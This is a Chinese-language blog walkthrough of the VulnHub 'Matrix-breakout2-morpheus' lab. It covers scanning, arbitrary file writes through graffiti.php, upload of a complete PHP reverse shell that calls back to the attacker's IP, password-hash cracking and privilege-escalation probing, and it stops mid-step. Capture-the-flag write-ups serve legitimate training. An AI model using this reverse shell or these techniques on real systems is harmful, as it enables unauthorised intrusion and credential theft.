{"id":741,"date":"2024-07-08T19:00:25","date_gmt":"2024-07-08T11:00:25","guid":{"rendered":"http:\/\/162.14.82.114\/?p=741"},"modified":"2024-07-08T19:00:25","modified_gmt":"2024-07-08T11:00:25","slug":"vulnhub-matrix-breakout2-morpheus","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/741\/07\/08\/2024\/","title":{"rendered":"vulnhub–Matrix-breakout2-morpheus"},"content":{"rendered":"

Matrix-breakout2-morpheus<\/h1>\n

\"image-20240707173808588\"<\/div><\/p>\n
\n

\u6ce8\u610f\u6539\u9776\u673a\u9700\u8981\u91c7\u7528vmware\u8fdb\u884c\u64cd\u4f5c\uff01<\/p>\n<\/blockquote>\n

\"image-20240708142755764\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ sudo rustscan -a $IP -- -A -sCV -Pn\n[sudo] password for kali: \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/root\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.146.128:80\nOpen 192.168.146.128:81\nOpen 192.168.146.128:22\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n|   256 aa:83:c3:51:78:61:70:e5:b7:46:9f:07:c4:ba:31:e4 (ECDSA)\n|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWNDAE21hrPYFpJ4+PvruHbth1s+HHqXYEKk12tnsBQE90v34m4qITkv\/TFumnzT24uw98ntLc2QnqC1lH3rVA=\n80\/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.51 ((Debian))\n| http-methods: \n|_  Supported Methods: POST OPTIONS HEAD GET\n|_http-server-header: Apache\/2.4.51 (Debian)\n|_http-title: Morpheus:1\n81\/tcp open  http    syn-ack ttl 64 nginx 1.18.0\n|_http-server-header: nginx\/1.18.0\n|_http-title: 401 Authorization Required\n| http-auth: \n| HTTP\/1.1 401 Unauthorized\\x0D\n|_  Basic realm=Meeting Place\nMAC Address: 00:0C:29:1C:23:31 (VMware)\nWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\nOS fingerprint not ideal because: Missing a closed TCP port so results incomplete\nAggressive OS guesses: Linux 5.0 - 5.5 (99%), Linux 2.6.32 (96%), Linux 3.2 - 4.9 (96%), Netgear ReadyNAS 2100 (RAIDiator 4.2.24) (96%), Linux 2.6.32 - 3.10 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (96%), Sony X75CH-series Android TV (Android 5.0) (95%), Linux 3.1 (95%), Linux 3.2 (95%)\nNo exact OS matches for host (test conditions non-ideal).\nTCP\/IP fingerprint:\nSCAN(V=7.94SVN%E=4%D=7\/8%OT=22%CT=%CU=42132%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=668B877E%P=x86_64-pc-linux-gnu)\nSEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)\nOPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B4ST11NW6%O6=M5B4ST11)\nWIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)\nECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW6%CC=Y%Q=)\nT1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)\nT2(R=N)\nT3(R=N)\nT4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)\nT5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)\nT6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)\nT7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)\nU1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)\nIE(R=Y%DFI=N%T=40%CD=S)\n\nUptime guess: 44.021 days (since Sat May 25 01:59:30 2024)\nNetwork Distance: 1 hop\nTCP Sequence Prediction: Difficulty=261 (Good luck!)\nIP ID Sequence Generation: All zeros\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.52 ms 192.168.146.128<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/$IP -f -x php,bak,zip,html.txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.146.128\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,bak,zip,html.txt\n[+] Add Slash:               true\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html.txt\/           (Status: 403) [Size: 280]\n\/.php\/                (Status: 403) [Size: 280]\n\/icons\/               (Status: 403) [Size: 280]\n\/javascript\/          (Status: 403) [Size: 280]\n\/graffiti.php\/        (Status: 200) [Size: 451]\n\/.php\/                (Status: 403) [Size: 280]\n\/.html.txt\/           (Status: 403) [Size: 280]\n\/server-status\/       (Status: 403) [Size: 280]\nProgress: 1102800 \/ 1102805 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ curl -v http:\/\/$IP                            \n*   Trying 192.168.146.128:80...\n* Connected to 192.168.146.128 (192.168.146.128) port 80\n> GET \/ HTTP\/1.1\n> Host: 192.168.146.128\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> \n< HTTP\/1.1 200 OK\n< Date: Mon, 08 Jul 2024 06:30:31 GMT\n< Server: Apache\/2.4.51 (Debian)\n< Last-Modified: Thu, 28 Oct 2021 06:24:12 GMT\n< ETag: "15c-5cf63c252ab85"\n< Accept-Ranges: bytes\n< Content-Length: 348\n< Vary: Accept-Encoding\n< Content-Type: text\/html\n< \n<html>\n        <head><title>Morpheus:1<\/title><\/head>\n        <body>\n                Welcome to the Boot2Root CTF, Morpheus:1.\n                <p>\n                You play Trinity, trying to investigate a computer on the \n                Nebuchadnezzar that Cypher has locked everyone else out of, at least for ssh.\n                <p>\n                Good luck!\n\n                - @jaybeale from @inguardians\n                <p>\n                <img src="trinity.jpeg">\n        <\/body>\n<\/html>\n* Connection #0 to host 192.168.146.128 left intact\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/morpheus]\n\u2514\u2500$ curl -v http:\/\/$IP:81\n*   Trying 192.168.146.128:81...\n* Connected to 192.168.146.128 (192.168.146.128) port 81\n> GET \/ HTTP\/1.1\n> Host: 192.168.146.128:81\n> User-Agent: curl\/8.5.0\n> Accept: *\/*\n> \n< HTTP\/1.1 401 Unauthorized\n< Server: nginx\/1.18.0\n< Date: Mon, 08 Jul 2024 06:33:35 GMT\n< Content-Type: text\/html\n< Content-Length: 179\n< Connection: keep-alive\n< WWW-Authenticate: Basic realm="Meeting Place"\n< \n<html>\n<head><title>401 Authorization Required<\/title><\/head>\n<body>\n<center><h1>401 Authorization Required<\/h1><\/center>\n<hr><center>nginx\/1.18.0<\/center>\n<\/body>\n<\/html>\n* Connection #0 to host 192.168.146.128 left intact<\/code><\/pre>\n
\"image-20240708143429179\"<\/div><\/p>\n
\"image-20240708143455070\"<\/div><\/p>\n
\u654f\u611f\u76ee\u5f55<\/h3>\n
\u626b\u5230\u4e86\u51e0\u4e2a\u654f\u611f\u76ee\u5f55\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
\"image-20240708143839956\"<\/div><\/p>\n
\u6253\u5f00\u6e90\u4ee3\u7801\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u540c\u540d\u7684.txt<\/code>\u6587\u4ef6\uff1a<\/p>\n
<form method="post">\n<label>Message<\/label><div><input type="text" name="message"><\/div>\n<input type="hidden" name="file" value="graffiti.txt">\n<div><button type="submit">Post<\/button><\/div>\n<\/form>\n<\/code><\/pre>\n
http:\/\/192.168.146.128\/graffiti.txt\nMouse here - welcome to the Nebby!\n\nMake sure not to tell Morpheus about this graffiti wall.\nIt's just here to let us blow off some steam.<\/code><\/pre>\n
\"image-20240708164851546\"<\/div><\/p>\n
\u53d1\u73b0\u51fa\u73b0\u5728\u4e86php<\/code>\u9875\u9762\u4e0a\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u5199\u5165\u53cd\u5f39shell\u5230\u65b0\u6587\u4ef6<\/p>\n
\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n
\u5c1d\u8bd5\u4e00\u4e0b\u6293\u5305\uff1a<\/p>\n
POST \/graffiti.php HTTP\/1.1\nHost: 192.168.146.128\nContent-Length: 32\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.146.128\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.146.128\/graffiti.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nmessage=whoami&file=graffiti.txt<\/code><\/pre>\n
\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff01<\/p>\n
POST \/graffiti.php HTTP\/1.1\nHost: 192.168.146.128\nContent-Length: 4062\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/192.168.146.128\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/192.168.146.128\/graffiti.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nmessage=<?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '192.168.146.131';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\n  $write_a = null;\n  $error_a = null;\n  $shell = 'uname -a; w; id; \/bin\/sh -i';\n  $daemon = 0;\n  $debug = 0;\n\n  \/\/\n  \/\/ Daemonise ourself if possible to avoid zombies later\n  \/\/\n\n  \/\/ pcntl_fork is hardly ever available, but will allow us to daemonise\n  \/\/ our php process and avoid zombies.  Worth a try...\n  if (function_exists('pcntl_fork')) {\n    \/\/ Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n      printit("ERROR: Can't fork");\n      exit(1);\n    }\n\n    if ($pid) {\n      exit(0);  \/\/ Parent exits\n    }\n\n    \/\/ Make the current process a session leader\n    \/\/ Will only succeed if we forked\n    if (posix_setsid() == -1) {\n      printit("Error: Can't setsid()");\n      exit(1);\n    }\n\n    $daemon = 1;\n  } else {\n    printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\n  }\n\n  \/\/ Change to a safe directory\n  chdir("\/");\n\n  \/\/ Remove any umask we inherited\n  umask(0);\n\n  \/\/\n  \/\/ Do the reverse shell...\n  \/\/\n\n  \/\/ Open reverse connection\n  $sock = fsockopen($ip, $port, $errno, $errstr, 30);\n  if (!$sock) {\n    printit("$errstr ($errno)");\n    exit(1);\n  }\n\n  \/\/ Spawn shell process\n  $descriptorspec = array(\n    0 => array("pipe", "r"),  \/\/ stdin is a pipe that the child will read from\n    1 => array("pipe", "w"),  \/\/ stdout is a pipe that the child will write to\n    2 => array("pipe", "w")   \/\/ stderr is a pipe that the child will write to\n  );\n\n  $process = proc_open($shell, $descriptorspec, $pipes);\n\n  if (!is_resource($process)) {\n    printit("ERROR: Can't spawn shell");\n    exit(1);\n  }\n\n  \/\/ Set everything to non-blocking\n  \/\/ Reason: Occsionally reads will block, even though stream_select tells us they won't\n  stream_set_blocking($pipes[0], 0);\n  stream_set_blocking($pipes[1], 0);\n  stream_set_blocking($pipes[2], 0);\n  stream_set_blocking($sock, 0);\n\n  printit("Successfully opened reverse shell to $ip:$port");\n\n  while (1) {\n    \/\/ Check for end of TCP connection\n    if (feof($sock)) {\n      printit("ERROR: Shell connection terminated");\n      break;\n    }\n\n    \/\/ Check for end of STDOUT\n    if (feof($pipes[1])) {\n      printit("ERROR: Shell process terminated");\n      break;\n    }\n\n    \/\/ Wait until a command is end down $sock, or some\n    \/\/ command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    \/\/ If we can read from the TCP socket, send\n    \/\/ data to process's STDIN\n    if (in_array($sock, $read_a)) {\n      if ($debug) printit("SOCK READ");\n      $input = fread($sock, $chunk_size);\n      if ($debug) printit("SOCK: $input");\n      fwrite($pipes[0], $input);\n    }\n\n    \/\/ If we can read from the process's STDOUT\n    \/\/ send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n      if ($debug) printit("STDOUT READ");\n      $input = fread($pipes[1], $chunk_size);\n      if ($debug) printit("STDOUT: $input");\n      fwrite($sock, $input);\n    }\n\n    \/\/ If we can read from the process's STDERR\n    \/\/ send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n      if ($debug) printit("STDERR READ");\n      $input = fread($pipes[2], $chunk_size);\n      if ($debug) printit("STDERR: $input");\n      fwrite($sock, $input);\n    }\n  }\n\n  fclose($sock);\n  fclose($pipes[0]);\n  fclose($pipes[1]);\n  fclose($pipes[2]);\n  proc_close($process);\n\n  \/\/ Like print, but does nothing if we've daemonised ourself\n  \/\/ (I can't figure out how to redirect STDOUT like a proper daemon)\n  function printit ($string) {\n    if (!$daemon) {\n      print "$string\n";}}?>&file=revshell.php<\/code><\/pre>\n
\u5c1d\u8bd5\u4e0a\u4f20\u5373\u53ef\uff1a<\/p>\n
\"image-20240708165403560\"<\/div><\/p>\n
\u5c1d\u8bd5\u8bbf\u95eehttp:\/\/192.168.146.128\/revshell.php<\/code>\u8fdb\u884c\u6fc0\u6d3b\uff1a<\/p>\n
\"image-20240708165625619\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
(remote) www-data@morpheus:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 Oct 28  2021 .\ndrwxr-xr-x 13 root     root     4096 Oct 28  2021 ..\ndrwxr-xr-x  2 www-data www-data 4096 Jul  8 08:53 html\n(remote) www-data@morpheus:\/var\/www$ cd html\n(remote) www-data@morpheus:\/var\/www\/html$ ls -la\ntotal 448\ndrwxr-xr-x 2 www-data www-data   4096 Jul  8 08:53 .\ndrwxr-xr-x 3 root     root       4096 Oct 28  2021 ..\n-rw-r--r-- 1 www-data www-data 381359 Oct 28  2021 .cypher-neo.png\n-rw-r--r-- 1 www-data www-data    770 Oct 28  2021 graffiti.php\n-rw-r--r-- 1 www-data www-data   4047 Jul  8 08:51 graffiti.txt\n-rw-r--r-- 1 www-data www-data    348 Oct 28  2021 index.html\n-rw-r--r-- 1 www-data www-data   4037 Jul  8 08:53 revshell.php\n-rw-r--r-- 1 www-data www-data     47 Oct 28  2021 robots.txt\n-rw-r--r-- 1 www-data www-data  44297 Oct 28  2021 trinity.jpeg<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u4e00\u4e2a\u9690\u85cf\u6587\u4ef6\u3002<\/p>\n
\u9690\u85cf\u6587\u4ef6\u5206\u6790<\/h3>\n
\u8fd0\u6c14\u4e0d\u9519\uff0c\u4ee5\u6765\u5c31\u627e\u5230\u4e86\u597d\u4e1c\u897f\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ stegseek .cypher-neo.png \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[!] error: the file format of the file ".cypher-neo.png" is not supported.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ binwalk .cypher-neo.png  \n\nDECIMAL       HEXADECIMAL     DESCRIPTION\n--------------------------------------------------------------------------------\n0             0x0             PNG image, 853 x 480, 8-bit\/color RGBA, non-interlaced\n138           0x8A            Zlib compressed data, best compression<\/code><\/pre>\n
\u7b2c\u4e8c\u6ce2\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\u4e00\u4e0b\uff1a<\/p>\n
(remote) www-data@morpheus:\/var\/nginx\/html$ cat .htpasswd \ncypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ echo 'cypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0' > hash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/morpheus]\n\u2514\u2500$ john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash    \nWarning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"\nUse the "--format=md5crypt-long" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256\/256 AVX2 8x3])\nWill run 4 OpenMP threads\nPress 'q' or Ctrl-C to abort, almost any other key for status\n0g 0:00:00:57 DONE (2024-07-08 05:09) 0g\/s 243734p\/s 243734c\/s 243734C\/s !!!0mc3t..*7\u00a1Vamos!\nSession completed.<\/code><\/pre>\n
\u53d1\u73b0\u6ca1\u6210\u529f\uff0c\u7ee7\u7eed\u641c\u96c6\u4e00\u6ce2\u4fe1\u606f\u3002<\/p>\n
(remote) www-data@morpheus:\/$ cat FLAG.txt \nFlag 1!\n\nYou've gotten onto the system.  Now why has Cypher locked everyone out of it?\n\nCan you find a way to get Cypher's password? It seems like he gave it to \nAgent Smith, so Smith could figure out where to meet him.\n\nAlso, pull this image from the webserver on port 80 to get a flag.\n\n\/.cypher-neo.png<\/code><\/pre>\n
\u5636\uff0c\u8fd9\u4e2a\u627e\u5230\u7684\u987a\u5e8f\u548b\u4e0d\u5bf9\u554a\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@morpheus:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@morpheus:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/sudo\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/sbin\/xtables-legacy-multi\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n(remote) www-data@morpheus:\/$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nnginx:x:999:999:nginx:\/var\/nginx:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nmessagebus:x:101:101::\/nonexistent:\/usr\/sbin\/nologin\nuuidd:x:102:102::\/run\/uuidd:\/usr\/sbin\/nologin\ntcpdump:x:103:103::\/nonexistent:\/usr\/sbin\/nologin\n_chrony:x:104:104:Chrony daemon,,,:\/var\/lib\/chrony:\/usr\/sbin\/nologin\nsystemd-network:x:105:106:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:106:107:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsshd:x:107:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-timesync:x:999:999:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nsystemd-coredump:x:998:998:systemd Core Dumper:\/:\/usr\/sbin\/nologin\ntrinity:x:1000:1000::\/home\/trinity:\/bin\/bash\ncypher:x:1001:1001::\/home\/cypher:\/bin\/bash\n(remote) www-data@morpheus:\/$ cd \/home\/cypher\/\nbash: cd: \/home\/cypher\/: Permission denied\n(remote) www-data@morpheus:\/$ cd \/home\/trinity\/\n(remote) www-data@morpheus:\/home\/trinity$ ls -la\ntotal 20\ndrwxr-xr-x 2 trinity trinity 4096 Oct 28  2021 .\ndrwxr-xr-x 4 root    root    4096 Oct 28  2021 ..\n-rw-r--r-- 1 trinity trinity  220 Aug  4  2021 .bash_logout\n-rw-r--r-- 1 trinity trinity 3526 Aug  4  2021 .bashrc\n-rw-r--r-- 1 trinity trinity  807 Aug  4  2021 .profile\n(remote) www-data@morpheus:\/home\/trinity$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/python3-9 cap_sys_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/sbin\/xtables-legacy-multi cap_net_admin=ep\n\/usr\/sbin\/xtables-nft-multi cap_net_admin=ep<\/code><\/pre>\n
\u53d1\u73b0\u4e86\u5177\u6709admin\u6743\u9650\uff0c\u53c2\u8003https:\/\/gtfobins.github.io\/gtfobins\/python\/#capabilities<\/p>\n
\u770b\u770b\u80fd\u4e0d\u80fd\u6267\u884c\uff1a<\/p>\n
(remote) www-data@morpheus:\/home\/trinity$ \/usr\/bin\/python3-9 -c 'import os; os.setuid(0); os.system("\/bin\/bash")'\nbash: \/usr\/bin\/python3-9: Permission denied\n(remote) www-data@morpheus:\/home\/trinity$ ls -la \/usr\/bin\/python3-9\n-rwxr-x--- 1 root humans 5479736 Oct 28  2021 \/usr\/bin\/python3-9<\/code><\/pre>\n
\u770b\u6765\u5148\u5f97\u62ff\u5230humans<\/code>\u6743\u9650\u3002\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@morpheus:\/home$ find \/ -user humans 2>\/dev\/null | grep -v proc\n(remote) www-data@morpheus:\/home$ find \/ -group humans 2>\/dev\/null | grep -v proc\n\/usr\/bin\/python3-9\n\/crew\n(remote) www-data@morpheus:\/home$ ls -la \/crew\ntotal 8\ndrwxrwxr-x  2 root humans 4096 Oct 28  2021 .\ndrwxr-xr-x 19 root root   4096 Oct 28  2021 ..\n(remote) www-data@morpheus:\/home$ cat \/etc\/passwd | grep 'humans'<\/code><\/pre>\n
\u6bdb\u90fd\u6ca1\u6709\uff0c\u5c1d\u8bd5\u8fdb\u4e00\u6b65\u4fe1\u606f\u641c\u96c6\uff0c\u60f3\u8d77\u6765\u524d\u9762\u90a3\u4e2a81\u7aef\u53e3\u4e86\uff0c\u4e0d\u77e5\u9053\u6709\u65e0\u9690\u85cf\u4fe1\u606f\uff0c\u5c1d\u8bd5\u641c\u7d22\u4e00\u4e0b\uff1a<\/p>\n
(remote) www-data@morpheus:\/etc\/nginx\/sites-enabled$ cat default \n##\n# You should look at the following URL's in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 81 default_server;\n        listen [::]:81 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don't use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/nginx\/html;\n\n        auth_basic "Meeting Place";\n        auth_basic_user_file \/var\/nginx\/html\/.htpasswd;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass unix:\/run\/php\/php7.4-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache's document root\n        # concurs with nginx's one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n# Virtual Host configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink that\n# to sites-enabled\/ to enable it.\n#\n#server {\n#       listen 80;\n#       listen [::]:80;\n#\n#       server_name example.com;\n#\n#       root \/var\/www\/example.com;\n#       index index.html;\n#\n#       location \/ {\n#               try_files $uri $uri\/ =404;\n#       }\n#}<\/code><\/pre>\n
\u53d1\u73b0\u4e86basic\u8ba4\u8bc1\u5bc6\u7801\u6587\u4ef6\uff0c\u7206\u7834\u4e0d\u51fa\u6765\u5bc6\u7801\uff0c\u4e0a\u4f20pspy64\uff0c\u4f46\u662f\u62a5\u6bb5\u9519\u8bef\u4e86\uff0c\u5c1d\u8bd5\u7ee7\u7eed\u641c\u96c6\u4e00\u4e0b\uff0c\u4e0a\u4f20linpeas.sh<\/code>\uff0c\u4e5f\u62a5\u9519\uff1a<\/p>\n
